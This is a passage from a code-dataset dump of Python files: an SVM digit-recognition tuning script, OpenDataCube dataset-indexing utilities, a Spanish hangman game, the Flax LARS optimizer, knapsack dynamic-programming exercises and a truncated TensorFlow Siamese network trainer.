(len(self.canvas[0]) + 2))\n out.write('\\n')\n for string in self.canvas:\n out.write('|')\n for symbol in string:\n out.write(symbol)\n out.write('|\\n')\n out.write('-' * (len(self.canvas[0]) + 2))\n out.write('\\n')\n\n\ndef help_print():\n print('Drawing tool syntax:\\n\\n', '', 'python program.py \"input_filename\" \"output_filename\"\\n', )\n\n\nif __name__ == \"__main__\":\n tool = DrawingTool()\n tool.draw()\n","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642440238","text":"#-*- coding=UTF-8 -*-\nfrom PIL import Image\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nimport os\nimport sys\nimport numpy as np\nimport time\nfrom sklearn import svm\nfrom tuning import grid_search\nimport utils \nimport analysis\nimport matplotlib.pyplot as plt\nimport joblib\n\n# create model\ndef create_svm(dataMat, dataLabel,path,decision='ovr'):\n\n param_grid = [{'kernel': ['linear'], 'C': [0.01, 0.1, 1, 10, 100, 1000, 10000],'decision_function_shape': ['ovr']}]\n print(\"Parameters:{}\".format(param_grid))\n scores = ['precision', 'recall']\n print(\"Tuning parameters: %s\" % param_grid)\n clf_list = grid_search(param_grid, scores, [dataMat, dataLabel], './tuning4/tuningt.txt')\n \n return clf_list\n\ndef model_test(model_path, clf=None, filename='out.txt', tcName=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']):\n path = sys.path[0]\n tbasePath = os.path.join(path, \"mnist/test/\")\n #tcName = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n tst = time.time()\n f = open(filename, \"w\")\n feature_cnt = len(tcName)\n allErrCount = 0; allErrorRate = 0.0; allScore = 0.0\n ErrCount=np.zeros(feature_cnt,int); TrueCount=np.zeros(feature_cnt,int)\n predict_list = []; true_list = []\n\n if clf == None:\n clf = joblib.load(model_path)\n\n for tcn in tcName:\n testPath = tbasePath + tcn\n tflist = utils.file2list(testPath)\n tdataMat, tdataLabel = utils.read2convert(tflist)\n print(\"test dataMat shape: {0}, test dataLabel len: {1} \".format(tdataMat.shape, len(tdataLabel)), file=f)\n pre_st = time.time(); preResult = clf.predict(tdataMat); pre_et = time.time()\n predict_list.append(preResult); true_list.append([tcn]*len(preResult))\n print(\"Recognition \" + tcn + \" spent {:.4f}s.\".format((pre_et - pre_st)), file=f)\n print(\"predict result: {}\".format(len(preResult)))\n errCount = len([x for x in preResult if x != tcn])\n ErrCount[int(tcn)]=errCount\n TrueCount[int(tcn)]= len(tdataLabel)-errCount\n print(\"errorCount: {}.\".format(errCount), file=f)\n allErrCount += errCount\n score_st = time.time()\n score = clf.score(tdataMat, tdataLabel)\n score_et = time.time()\n print(\"computing score spent {:.6f}s.\".format(score_et - score_st), file=f)\n allScore += score\n print(\"score: {:.6f}.\".format(score), file=f)\n print(\"error rate is {:.6f}.\".format((1 - score)), file=f)\n \n tet = time.time()\n print(\"Testing All class total spent {:.6f}s.\".format(tet - tst), file=f)\n print(\"All error Count is: {}.\".format(allErrCount), file=f)\n avgAccuracy = allScore / (feature_cnt*1.0)\n print(\"Average accuracy is: {:.6f}.\".format(avgAccuracy), file=f)\n print(\"Average error rate is: {:.6f}.\".format(1 - avgAccuracy), file=f)\n print(\"number\",\" TrueCount\",\" ErrCount\", file=f)\n for tcn in tcName:\n tcn=int(tcn)\n print(tcn,\" \",TrueCount[tcn],\" \",ErrCount[tcn], file=f)\n plt.figure(figsize=(12, 
6))\n x=list(range(feature_cnt))\n plt.plot(x,TrueCount, color='blue', label=\"TrueCount\") # plot per-class correct counts in blue\n plt.plot(x,ErrCount, color='red', label=\"ErrCount\") # plot per-class error counts in red\n plt.legend(loc='best') # legend position; 'best' lets matplotlib choose\n plt.title('Projects')\n plt.xlabel('number') # x-axis label\n plt.ylabel('count') # y-axis label\n plt.xticks(np.arange(feature_cnt), tcName)\n plt.savefig('./accuracy_%s.jpg' % filename.split('_')[1])\n plt.show()\n f.close()\n\n true_list = np.array(true_list).flatten()\n predict_list = np.array(predict_list).flatten()\n return [predict_list, true_list]\n\nif __name__ == '__main__':\n\n st = time.time()\n iris = load_iris()\n\n dataMat, dataLabel = utils.read_folder_img(cName = ['1', '2', '3', '4', '5', '6', '7', '8', '9'], delimit=6)\n print(dataMat.shape); print(dataLabel)\n path = sys.path[0]\n model_path=os.path.join(path,'model/svm_best.model') \n \n clf_list = create_svm(dataMat, dataLabel, model_path, decision='ovr')\n i = 0; \n for clf in clf_list:\n scores = ['precision', 'accuracy']\n y_predict, y_true = model_test(model_path, clf, './tuning4/out_%s_test.txt' % scores[i], ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])\n analysis.my_classification_report(y_true, y_predict, True, './tuning4/report_%s_test.txt' % scores[i])\n np.savetxt('./tuning4/y_pred_%s.txt' % scores[i], y_predict, fmt=\"%s\", delimiter=',')\n np.savetxt('./tuning4/y_true_%s.txt' % scores[i], y_true, fmt=\"%s\", delimiter=',')\n i += 1","sub_path":"raw/tune_core4.py","file_name":"tune_core4.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"385286294","text":"import click\nimport logging\nimport importlib_resources\nfrom datadog import statsd, initialize\nfrom odc.aws.queue import publish_to_topic\nfrom typing import Iterable, Optional, Union\n\nfrom datacube import Datacube\nfrom datacube.index.hl import Doc2Dataset\nfrom datacube.utils import changes\nfrom ._stac import ds_to_stac\n\nESRI_LANDCOVER_BASE_URI = (\n \"https://ai4edataeuwest.blob.core.windows.net/io-lulc/\"\n \"io-lulc-model-001-v01-composite-v03-supercell-v02-clip-v01/{id}_20200101-20210101.tif\"\n)\n\nMICROSOFT_PC_STAC_URI = \"https://planetarycomputer.microsoft.com/api/stac/v1/\"\n\n\nclass IndexingException(Exception):\n \"\"\"\n Exception raised on errors during SQS-to-DC indexing/archiving\n \"\"\"\n\n\nclass SkippedException(Exception):\n \"\"\"\n Exception raised when a dataset already exists and updating is not enabled\n \"\"\"\n\n\n# A whole bunch of generic Click options\nskip_lineage = click.option(\n \"--skip-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is not to skip lineage. Set to skip lineage altogether.\",\n)\n\nfail_on_missing_lineage = click.option(\n \"--fail-on-missing-lineage/--auto-add-lineage\",\n is_flag=True,\n default=True,\n help=(\n \"Default is to fail if lineage documents not present in the database. \"\n \"Set auto add to try to index lineage documents.\"\n ),\n)\n\nverify_lineage = click.option(\n \"--verify-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is no verification. 
Set to verify parent dataset definitions.\",\n)\n\ntransform_stac = click.option(\n \"--stac\",\n is_flag=True,\n default=False,\n help=\"Expect STAC 1.0 metadata and attempt to transform to ODC EO3 metadata.\",\n)\n\ntransform_stac_absolute = click.option(\n \"--absolute\",\n is_flag=True,\n default=False,\n help=\"Use absolute paths from the STAC document.\",\n)\n\nupdate_flag = click.option(\n \"--update\",\n is_flag=True,\n default=False,\n help=\"If set, update instead of add datasets.\",\n)\n\nupdate_if_exists_flag = click.option(\n \"--update-if-exists\",\n is_flag=True,\n default=False,\n help=\"If the dataset or product already exists, update it instead of skipping it.\",\n)\n\nallow_unsafe = click.option(\n \"--allow-unsafe\",\n is_flag=True,\n default=False,\n help=\"Allow unsafe changes to a dataset. Take care!\",\n)\n\nskip_check = click.option(\n \"--skip-check\",\n is_flag=True,\n default=False,\n help=\"Assume file exists when listing exact file rather than wildcard.\",\n)\n\nno_sign_request = click.option(\n \"--no-sign-request\",\n is_flag=True,\n default=False,\n help=\"Do not sign AWS S3 requests.\",\n)\n\nrequest_payer = click.option(\n \"--request-payer\",\n is_flag=True,\n default=False,\n help=\"Needed when accessing requester pays public buckets.\",\n)\n\narchive_less_mature = click.option(\n \"--archive-less-mature\",\n is_flag=True,\n default=False,\n help=(\n \"Archive existing any datasets that match product, \"\n \"time and region-code, but have lower dataset-maturity.\"\n \"Note: An error will be raised and the dataset add will \"\n \"fail if a matching dataset with higher or equal dataset-maturity.\"\n ),\n)\n\npublish_action = click.option(\n \"--publish-action\",\n type=str,\n default=None,\n nargs=1,\n help=\"SNS topic arn to publish indexing/archiving actions to.\",\n)\n\narchive = click.option(\n \"--archive\",\n is_flag=True,\n default=False,\n help=\"Archive datasets instead of adding them.\",\n)\n\nlimit = click.option(\n \"--limit\",\n default=None,\n type=int,\n help=\"Stop indexing after n datasets have been indexed.\",\n)\n\nbbox = click.option(\n \"--bbox\",\n type=str,\n default=None,\n help=\"Comma separated list of bounding box coords, lon-min, lat-min, lon-max, lat-max\",\n)\n\nstatsd_setting = click.option(\n \"--statsd-setting\",\n is_flag=False,\n default=None,\n help=\"statsd exporter hostname and port, i.e. prometheus-statsd-exporter:9125\",\n)\n\n\ndef get_esri_list():\n stream = importlib_resources.files(__name__).joinpath(\"esri-lc-tiles-list.txt\")\n with stream as f:\n for tile in f.readlines():\n tile_id = tile.decode().rstrip(\"\\n\")\n yield ESRI_LANDCOVER_BASE_URI.format(id=tile_id)\n\n\ndef index_update_dataset(\n metadata: dict,\n uri: str,\n dc: Datacube,\n doc2ds: Doc2Dataset,\n update: bool = False,\n update_if_exists: bool = False,\n allow_unsafe: bool = False,\n archive_less_mature: Optional[Union[bool, Iterable[str]]] = None,\n publish_action: Optional[str] = None,\n stac_doc: Optional[dict] = None,\n) -> int:\n \"\"\"\n Index and/or update a dataset. 
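The whole operation runs inside a single index transaction. 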
Called by all the **_to_dc CLI tools.\n\n :param metadata: A dataset metadata dictionary, read from yaml or json, converted from STAC, etc.\n :param uri: The URI of the metadata and associated data.\n :param dc: A datacube object (carries a database index and potentially an active transaction).\n :param doc2ds: A Doc2Dataset object (metadata_type and product resolver)\n :param update: If true, allow update only.\n :param update_if_exists: If true allow insert or update.\n :param allow_unsafe: Allow unsafe (arbitrary) dataset updates.\n :param archive_less_mature: Enforce dataset maturity.\n * If None (the default) or False or an empty iterable, ignore dataset maturity.\n * If True, enforce dataset maturity by looking for existing datasets with same product, region_code and time\n values. If a less mature match is found, it is archived and replaced with the new dataset being inserted.\n If a match of the same or greater maturity is found a SkippedException is raised.\n * If an iterable of valid search field names is provided, it is used as the \"grouping\" fields for\n identifying dataset maturity matches.\n (i.e. `archive_less_mature=True` is the same as `archive_less_mature=['region_code', 'time'])\n :param publish_action: SNS topic arn to publish action to.\n :param stac_doc: STAC document for publication to SNS topic.\n :return: Returns nothing. Raises an exception if anything goes wrong.\n \"\"\"\n if uri is None:\n raise IndexingException(\"Failed to get URI from metadata doc\")\n # Make sure we can create a dataset first\n try:\n ds, err = doc2ds(metadata, uri)\n except ValueError as e:\n raise IndexingException(\n f\"Exception thrown when trying to create dataset: '{e}'\\n The URI was {uri}\"\n ) from e\n if ds is None:\n raise IndexingException(\n f\"Failed to create dataset with error {err}\\n The URI was {uri}\"\n )\n\n with dc.index.transaction():\n # Process in a transaction\n archive_stacs = []\n added = False\n updated = False\n if archive_less_mature and publish_action:\n dupes = dc.index.datasets.find_less_mature(ds, 500)\n for dupe in dupes:\n archive_stacs.append(ds_to_stac(dupe))\n\n # Now do something with the dataset\n # Note that any of the exceptions raised below will rollback any archiving performed above.\n if dc.index.datasets.has(metadata.get(\"id\")):\n # Update\n if update or update_if_exists:\n # Set up update fields\n updates = {}\n if allow_unsafe:\n updates = {tuple(): changes.allow_any}\n # Do the updating\n try:\n dc.index.datasets.update(\n ds,\n updates_allowed=updates,\n archive_less_mature=archive_less_mature,\n )\n updated = True\n except ValueError as e:\n raise IndexingException(\n f\"Updating the dataset raised an exception: {e}\"\n )\n else:\n logging.warning(\"Dataset already exists, not indexing\")\n raise SkippedException(\n f\"Dataset {metadata.get('id')} already exists, not indexing\"\n )\n else:\n if update:\n # We're expecting to update a dataset, but it doesn't exist\n raise IndexingException(\n \"Can't update dataset because it doesn't exist.\"\n )\n # Everything is working as expected, add the dataset\n dc.index.datasets.add(ds, archive_less_mature=archive_less_mature)\n added = True\n\n if publish_action:\n for arch_stac in archive_stacs:\n publish_to_topic(arn=publish_action, action=\"ARCHIVED\", stac=arch_stac)\n\n if added:\n logging.info(\"New Dataset Added: %s\", ds.id)\n if publish_action:\n # if STAC was not provided, generate from dataset\n stac_doc = stac_doc if stac_doc else ds_to_stac(ds)\n 
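# announce the newly added dataset on the SNS topic (action ADDED, with its STAC document)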
publish_to_topic(arn=publish_action, action=\"ADDED\", stac=stac_doc)\n\n if updated:\n logging.info(\"Existing Dataset Updated: %s\", ds.id)\n\n\ndef statsd_gauge_reporting(value, tags=None, statsd_setting=\"localhost:8125\"):\n if tags is None:\n tags = []\n host = statsd_setting.split(\":\")[0]\n port = statsd_setting.split(\":\")[1]\n options = {\"statsd_host\": host, \"statsd_port\": port}\n initialize(**options)\n\n statsd.gauge(\"datacube_index\", value, tags=tags)\n","sub_path":"apps/dc_tools/odc/apps/dc_tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"195376814","text":"import random\nimport os\nimport sys\nimport time\n\npalabras = ['ASCENSOR', 'BELLOTA', 'CAFETERA', 'CHANCHO', 'DELIRIO',\n 'ELEFANTE', 'FLAUTA', 'GIGANTESCO', 'HERMOSO', 'INDEPENDENCIA',\n 'JEFATURA', 'KILOGRAMO', 'LEJANO', 'LLANURA', 'MATRIMONIO',\n 'NORTE', 'ORQUESTA', 'POLICIA', 'QUESADILLA',\n 'RETIRO', 'SOLEADO', 'TERMOMETRO', 'UMBRAL', 'VENTANA',\n 'WHATSAPP', 'XILOFONO', 'YARDA', 'ZORRO']\n\n# list() turns the word picked by the random module\n# into an iterable list of characters\n\n\ndef obtener_palabra_aleatoria():\n palabra = list(random.choice(palabras))\n return palabra\n\n\nfigura = ['''\n +---+\n | \n | \n |\n ===\n VIDAS = 6''', '''\n +---+\n O | \n |\n |\n ===\n VIDAS = 5''', '''\n +---+\n O |\n | |\n |\n ===\n VIDAS = 4''', '''\n +---+\n O | \n /| | \n |\n ===\n VIDAS = 3''', '''\n +---+\n O | \n /|\\ | \n |\n ===\n VIDAS = 2''', '''\n +---+\n O | \n /|\\ | \n / |\n ===\n VIDAS = 1''', '''\n +---+\n O | \n /|\\ | \n / \\ |\n ===\n AHORCADO''']\n\ntodas_las_letras = [] # letters guessed so far\nfallos = 0 # miss counter\nresultado = [] # '_' placeholders, replaced as letters are guessed\n\n\ndef clear(): # clear the console, depending on the operating system\n if sys.platform.startswith('win'):\n os.system('cls')\n elif sys.platform.startswith('darwin'):\n os.system('clear')\n elif sys.platform.startswith('linux'):\n os.system('clear')\n\n\n# add one '_' per letter of the chosen word\npalabra = obtener_palabra_aleatoria()\nfor a in range(len(palabra)):\n resultado.append('_')\n\n\nwhile True:\n clear()\n print('************ JUEGO DEL AHORCADO ***********')\n print('*******************************************')\n print(figura[fallos])\n print()\n print(' ', end='')\n for c in resultado:\n print(c, end='')\n print()\n print()\n if resultado == palabra:\n print('*************** HAS GANADO ***************')\n break\n if fallos >= 6:\n print('La palabra era:', ''.join(palabra))\n print('************** HAS PERDIDO ***************')\n break\n while True:\n letra_sin_formato = input('Ingresa una letra: ')\n letra_usuario = letra_sin_formato.upper()\n if len(letra_usuario) != 1:\n print('Introduce una letra')\n elif letra_usuario in todas_las_letras:\n print('Ya ingreso esa letra')\n elif letra_usuario not in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n print('Introduce una letra')\n else:\n todas_las_letras.append(letra_usuario)\n break\n for d in range(len(palabra)):\n if palabra[d] == letra_usuario:\n resultado[d] = letra_usuario\n if letra_usuario not in palabra:\n fallos += 1\n print()\n print()\n","sub_path":"M2_S6_grupal/grupal_2_6.py","file_name":"grupal_2_6.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"560357257","text":"# Copyright 2021 The Flax 
Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .. import struct\n\nimport jax.numpy as jnp\n\nimport numpy as np\n\nfrom .base import OptimizerDef\n\n\n@struct.dataclass\nclass _LARSHyperParams:\n learning_rate: np.ndarray\n beta: np.ndarray\n weight_decay: np.ndarray\n trust_coefficient: np.ndarray\n eps: np.ndarray\n nesterov: bool\n\n\n@struct.dataclass\nclass _LARSParamState:\n momentum: np.ndarray\n\n\nclass LARS(OptimizerDef):\n \"\"\"Layerwise adaptive rate scaling (LARS) optimizer.\n\n See https://arxiv.org/abs/1708.03888\n \"\"\"\n\n def __init__(self, learning_rate=None, beta=0.9, weight_decay=0,\n trust_coefficient=0.001, eps=0, nesterov=False):\n \"\"\"Constructor for the LARS optimizer.\n\n Args:\n learning_rate: the step size used to update the parameters.\n beta: the coefficient used for the moving average of the\n gradient (default: 0.9).\n weight_decay: weight decay coefficient to apply\n trust_coefficient: coefficient for trust ratio computation\n (default: 0.001).\n eps: epsilon used for trust ratio computation (default: no epsilon).\n nesterov: whether to use Nesterov momentum (default: False).\n \"\"\"\n\n hyper_params = _LARSHyperParams(\n learning_rate, beta, weight_decay, trust_coefficient, eps, nesterov)\n super().__init__(hyper_params)\n\n def init_param_state(self, param):\n return _LARSParamState(jnp.zeros_like(param))\n\n def apply_param_gradient(self, step, hyper_params, param, state, grad):\n del step\n assert hyper_params.learning_rate is not None, 'no learning rate provided.'\n\n param_norm = jnp.linalg.norm(param)\n grad_norm = jnp.linalg.norm(grad)\n trust_ratio = hyper_params.trust_coefficient * param_norm / (\n grad_norm + hyper_params.weight_decay * param_norm + hyper_params.eps)\n clipped_trust_ratio = jnp.where(\n jnp.logical_or(grad_norm == 0., param_norm == 0.), 1., trust_ratio)\n scaled_lr = hyper_params.learning_rate * clipped_trust_ratio\n if hyper_params.weight_decay != 0:\n grad += hyper_params.weight_decay * param\n\n scaled_grad = scaled_lr * grad\n momentum = state.momentum\n new_momentum = hyper_params.beta * momentum + scaled_grad\n if hyper_params.nesterov:\n d_p = scaled_grad + hyper_params.beta * new_momentum\n else:\n d_p = new_momentum\n new_param = param - d_p\n new_state = _LARSParamState(new_momentum)\n return new_param, new_state\n","sub_path":"flax/optim/lars.py","file_name":"lars.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220358084","text":"#!/usr/bin/python3\nimport sys\nimport time\nimport pprint as pp\n\ndef knap_sack_recursive(val, bag_strength):\n if bag_strength <= 0: return 0\n\n max_val = 0\n for k in val:\n if k <= bag_strength:\n copy=val.copy()\n copy.pop(k)\n max_val = max(max_val, val[k] + knap_sack_recursive(copy, bag_strength-k))\n\n return(max_val)\n\ndef knap_sack(w, T):\n k=sorted(w.keys())\n# pp.pprint(w)\n\n M=[[0 for _ in range(T+1)] for _ in k]\n\n for i in range(len(k)):\n for j in 
range(T+1):\n if i == 0:\n if j == 0:\n M[i][j] = 0\n else:\n M[i][j] = w[k[i]] if k[i] <= j else 0\n else:\n consider = w[k[i]] + M[i-1][j-k[i]] if k[i] <= j else 0\n donotconsider = M[i-1][j]\n M[i][j] = max(consider, donotconsider)\n\n# pp.pprint(M)\n return(M[-1][-1])\n\ndef getWays_knap_sack_dp_bottom_up(val, bag_strength):\n wt=[0] + list(val.keys())\n wt.sort()\n destination = bag_strength\n\n # Create the matrix/storage \n M = [[0 for _ in range(destination+1)] for _ in range(len(wt))]\n\n # Base 1 - when wt is 1(only 1) # then all sow will val[1] if same_allowed else i*val[1]\n for i in range(1,destination+1):\n if wt[1] > i: # If wt of 1st element is more than present sow\n M[1][i] = 0\n elif same_allowed:\n M[1][i] = val[wt[1]]*i\n else:\n M[1][i] = val[wt[1]]\n \n # Base 2 - when sow is 0 # No wt can be used.\n for i in range(1,len(wt)): M[i][0] = 0 # Already covered above.\n\n for row in range(2,len(wt)):\n for col in range(1,destination+1):\n # if row==0 and col==0:\n # M[row][col] = 0\n # else:\n val_by_excl = M[row-1][col] if row-1 > 0 else 0\n if wt[row] > col:\n val_by_incl = 0\n else:\n value_of_sow_for_remaining = M[row][col-wt[row]] if same_allowed else M[row-1][col-wt[row]]\n val_by_incl = val[wt[row]] + value_of_sow_for_remaining\n #val_by_incl = val[wt[row]] + M[row-1][col-wt[row]] if wt[row] <= col else 0\n M[row][col] = max(val_by_incl, val_by_excl)\n #print(row,col,wt[row],val[wt[row]],M[row][col],val_by_excl,val_by_incl)\n\n pp.pprint(M)\n# elements = set()\n# previous=len(wt)-1\n# for present in range(1,len(wt)-2):\n# print(previous, present)\n# if previous:\n# if M[previous][-1] == M[present][-1]:\n# previous=present\n# continue\n# else:\n# elements.add(present)\n# previous=None\n# else:\n# previous=present\n# print(elements)\n return(M[-1][-1])\n\n\"\"\"\nTest Case 1:\n-------------\nInput => {1: 1, 2: 4, 3: 4, 4: 5, 5: 7} \n 9\nResult => 13\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [0, 1, 4, 5, 5, 5, 5, 5, 5, 5],\n [0, 1, 4, 5, 5, 8, 9, 9, 9, 9],\n [0, 1, 4, 5, 5, 8, 9, 10, 10, 13],\n [0, 1, 4, 5, 5, 8, 9, 11, 12, 13]]\n\"\"\"\nkey_val = {1:1, 2:4, 3:4, 4:5, 5:7}\nn = 9\nsame_allowed = False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 2:\n-------------\nInput => {1: 1, 3: 4, 4: 5, 5: 7} \n 7\nResult => 9\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 1, 1, 1, 1, 1],\n [0, 1, 1, 4, 5, 5, 5, 5],\n [0, 1, 1, 4, 5, 6, 6, 9],\n [0, 1, 1, 4, 5, 7, 8, 9]]\n\"\"\"\nkey_val = {1: 1, 3: 4, 4: 5, 5: 7}\nn = 7\nsame_allowed = False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 3:\n-------------\nInput => {2: 3, 3: 7, 4: 2, 5: 9} \n 5\nResult => 10\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0],\n [0, 3, 3, 3, 3, 3],\n [0, 3, 3, 7, 10, 10],\n [0, 3, 3, 7, 10, 10],\n [0, 3, 3, 7, 10, 10]]\n\"\"\"\nkey_val = {2: 3, 3: 7, 4: 2, 5: 9}\nn = 5\nsame_allowed = False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 4:\n-------------\nInput => {1: 5, 2: 3, 4: 5, 5: 2} \n 5\nResult => 10\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0],\n [0, 5, 5, 5, 5, 5],\n [0, 5, 5, 8, 8, 8],\n [0, 5, 5, 8, 8, 10],\n [0, 5, 5, 8, 8, 10]]\n\"\"\"\nkey_val = {1: 5, 2: 3, 4: 5, 5: 2}\nn = 5\nsame_allowed = 
False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 5:\n-------------\nInput => {2: 3, 3: 4, 4: 5, 5: 6} \n 5\nResult => 7\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0],\n [0, 0, 3, 3, 3, 3],\n [0, 0, 3, 4, 4, 7],\n [0, 0, 3, 4, 5, 7],\n [0, 0, 3, 4, 5, 7]]\n\"\"\"\nkey_val = {2: 3, 3: 4, 4: 5, 5: 6}\nn = 5\nsame_allowed = False\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n","sub_path":"python3/dynamicprogramming/2.knapsack.problem.1.0.py","file_name":"2.knapsack.problem.1.0.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"429397170","text":"import os\r\nimport tensorflow as tf\r\nimport Dataset\r\n\r\n#Change Log\r\n#N/A\r\n\r\nScript_tag = 'Siamesev1.0.py'\r\n\r\n#Load and Save Functions\r\nSave_load = False\r\nSave_save = False\r\nSave_name = 'Version1.0'\r\nSave_dir = 'C:\\\\Users\\\\Imam\\\\Documents\\\\PROGRAMMING PROJECTS\\\\LaunchX'\r\nSave_location = Save_dir+Script_tag+Save_name\r\nif not os.path.exists(Save_dir):\r\n os.makedirs(Save_dir)\r\n\r\n#Open Data Set\r\ntrainingData = Dataset.dataAssembler(0,10)\r\ntestData = Dataset.dataAssembler(10,90)\r\n\r\n#Training step count variable\r\ntraining_steps = 1\r\n\r\n#Batch Size\r\nbatch_size = 256\r\n\r\n#Epoch Amount\r\nepoch_amm =30\r\n\r\n#Input Data Params\r\ndata_dimension = [None, 784]\r\n\r\n#I/O Placeholders \r\nx1 = tf.placeholder(tf.float32, data_dimension)\r\nx2 = tf.placeholder(tf.float32, data_dimension)\r\ny = tf.placeholder(tf.float32)\r\n\r\n#Learning Rate For Network\r\nflat_rate = False\r\nbase_Rate = .001\r\ndecay_steps = 64\r\ndecay_rate = .97\r\nStaircase = True\r\n\r\n#Learning Rate Definition\r\nif not flat_rate:\r\n Learning_Rate = tf.train.exponential_decay(base_Rate, training_steps, decay_steps, decay_rate, staircase=Staircase, name='Exp_decay' )\r\nelse:\r\n Learning_Rate = base_Rate\r\n\r\n#Convolution function returns neurons that act on a section of prev. 
layer\r\ndef conv2d(x,W):\r\n return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding='SAME')\r\n\r\n#Pooling function returns max value in 2 by 2 sections \r\ndef maxpool2d(x):\r\n return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\r\n\r\n#RELU (rectified linear unit)\r\ndef relu(x):\r\n return tf.nn.relu(x,'relu')\r\n\r\n#Matrix broadcasting addition \r\ndef add(x, b):\r\n return tf.add(x,b)\r\n\r\n#Weight initializer \r\ndef weight_def(shape):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\n\r\n#Bias intializer \r\ndef bias_def(shape):\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\n\r\n\r\n#'Main' method, contains the Neural Network \r\ndef convolutional_neural_network(x1, x2):\r\n weights = {'W_fc':weight_def([784,512]),\r\n 'W_fc2':weight_def([1024,1024]),\r\n 'W_out':weight_def([1024,2]),}\r\n \r\n biases = {'B_fc':bias_def([512]),\r\n 'B_fc2':bias_def([1024]),\r\n 'B_out':bias_def([2])}\r\n \r\n #Siamese 1\r\n fc1 = tf.matmul(x1,weights['W_fc'])\r\n fc1 = add(fc1,biases['B_fc'])\r\n fc1 = relu(fc1)\r\n\r\n #siamese 2\r\n fc2 = tf.matmul(x2,weights['W_fc'])\r\n fc2 = add(fc2,biases['B_fc'])\r\n fc2 = relu(fc2)\r\n \r\n #Conector Op\r\n fc = tf.concat([fc1, fc2], 1)\r\n\r\n #Fc Layer\r\n fc = tf.matmul(fc,weights['W_fc2'])\r\n fc = add(fc,biases['B_fc2'])\r\n fc = relu(fc)\r\n\r\n #final layer\r\n output = tf.matmul(fc,weights['W_out'])\r\n output = add(output,biases['B_out'])\r\n \r\n return output\r\n\r\n#Trains The neural Network\r\ndef train_neural_network(x1,x2):\r\n\r\n training_steps = 0\r\n #Initiate The Network\r\n prediction = convolutional_neural_network(x1, x2)\r\n \r\n #Define the Cost and Cost function\r\n #tf.reduce_mean averages the values of a tensor into one value\r\n cost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=prediction) )\r\n\r\n #Optimizer + Learning_Rate passthrough\r\n optimizer = tf.train.AdamOptimizer(Learning_Rate).minimize(cost)\r\n \r\n #Get Epoch Ammount \r\n hm_epochs = epoch_amm\r\n \r\n #Save_saver = tf.train.Saver({'W_conv1':weights[W_conv1] ,'W_conv2':weights[W_conv2] ,'W_fc':weights[W_fc] ,'W_out':weights[W_out] ,'B_conv1':biases[B_conv1] ,'B_conv2':biases[B_conv2] ,'B_fc':biases[B_fc] ,'B_out':biases[B_out]})\r\n Save_saver = tf.train.Saver()\r\n \r\n #Starts C++ Training session\r\n print('Session Started, ', Script_tag)\r\n with tf.Session() as sess:\r\n \r\n #Initiate and Load all Variables\r\n sess.run(tf.global_variables_initializer())\r\n if Save_load: \r\n Save_saver.restore(sess , Save_location)\r\n \r\n #Begin Logs\r\n summary_writer = tf.summary.FileWriter('/tmp/logs',sess.graph)\r\n \r\n #Start Training\r\n for epoch in range(hm_epochs):\r\n \r\n #Holds Data for loss and accuracy functions\r\n epoch_loss = 0\r\n acc_total = 0\r\n for count in range(int(trainingData.num_examples/batch_size)):\r\n \r\n #Training code\r\n training_steps = (training_steps+1)\r\n epoch_x1, epoch_x2, epoch_y = trainingData.generateSiameseBatch(batch_size)\r\n 